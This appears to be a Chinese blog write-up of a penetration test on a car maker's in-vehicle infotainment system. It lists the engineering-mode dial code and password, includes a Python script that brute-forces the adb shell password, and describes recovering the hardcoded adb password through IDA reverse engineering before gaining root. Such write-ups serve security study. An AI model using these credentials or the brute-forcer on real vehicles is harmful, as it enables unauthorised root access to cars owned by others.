Hacked某安汽车车机系统

    很久之前尝试对某安汽车的车机系统进行渗透测试，但是却卡在入口无法进入，尝试暴力破解但是字典不够强大，没能成功。前段时间看到了绿盟科技博客的《新型车机，如何攻防？》感觉有点熟悉，再次探索发现可以获得车机系统root权限，遂事后诸葛亮一波，就当是学习笔记了。

    通过在论坛、QQ群、贴吧收集到这款车型进入工程模式的方法，在拨号键盘输入*#*#888，然后点击拨号，如图：

    进入密码认证界面，输入收集到的密码：369875，如图：

    此时进入工程模式，可以看到工程模式的功能，如图：

    点击“USB切换”可以将中控台下边的USB口切换为adb模式，从而通过数据线连接车机系统adb shell。可能我们需要启动USB调试，首先点击“打开系统设置原始界面 ——> Settings”，如图：

    此时进入系统设置界面，可以看到下边有“关于智能平台”，如图：

     点击“关于智能平台”后可以看到Android 版本、硬件型号版本号等等信息，如图：

    连续点击7次版本号后开启开发者模式，然后开启USB调试，如图：

     在连接adb shell时提示需要输入密码，如图：

    当时卡在这里很久，编写Python脚本使用字典爆破了很久也没成功，Python3脚本如下：

import pexpect
import random
import sys
# Open the password dictionary file

if len(sys.argv) < 2:
    print("Usage: python3",sys.argv[0],"password.txt")
    exit(0)
else:
    print("ADB Shell Brute         --By Infiltrator")
    with open(sys.argv[1]) as f:
        passwords = f.readlines()
    adb = pexpect.spawnu("adb shell",timeout=1)
    #adb.logfile_read = sys.stdout
    # Try each password in the dictionary file
    for password in passwords:
        password = password.strip()  # Remove leading/trailing whitespace
        # Wait for the password prompt
        try:
            s = adb.expect("password:")
        except:
            print("[!] Please check adb if connected!")
            exit(1)
        # Enter the password
        print("\r[*] Testing password:",password,end='')
        adb.sendline(password)
        # Wait for the output and check if we successfully logged in
        s = adb.expect(["verify success!", "verify failed!"])
        if s == 0:
            # Login succeeded, we're done
            print("\n[+] Success! Password is:", password)
            break
        else:
            # Login failed, try the next password
            continue

     直到看到新型车机，如何攻防？，文中逆向分析获得的密码立即让我觉得很是熟悉，如图：

    我直接使用该密码就可以成功登录adb shell，同时把密码加入字典后也可以破解出来，说明脚本没问题：

     并且直接执行su命令就获得root权限，如图：

    虽然限制策略不严格但是，adb push和adb install都无法安装app，暂时就先不管这些了，先复现一下硬编码漏洞吧。

    普通权限的adb pull命令基本获取不到什么有用的信息，执行adb root切换为root权限的adb，然后在使用adb pull将车机系统的文件系统下载到本地，如图：

    由于下载的文件太多，等了几分钟也没下载完，然后就直接下载system目录了，如图： 

    在system/bin目录下发现adbd程序，如图：

    使用IDA逆向分析，通过搜索password字符串定位程序输入，然而根本找不到password这个字符串，查看所有字符串可以发现程序调用了/system/bin/verify_sh，如图：

    使用IDA分析verify_sh，同样直接搜索password字符串定位输入，然后跳转到代码上下文发现内存中Base64编码的内容：

    解码之后为8769b3ad，应该是小端序的原因，将原本的adb36987在内存中存储为8769b3ad，如图：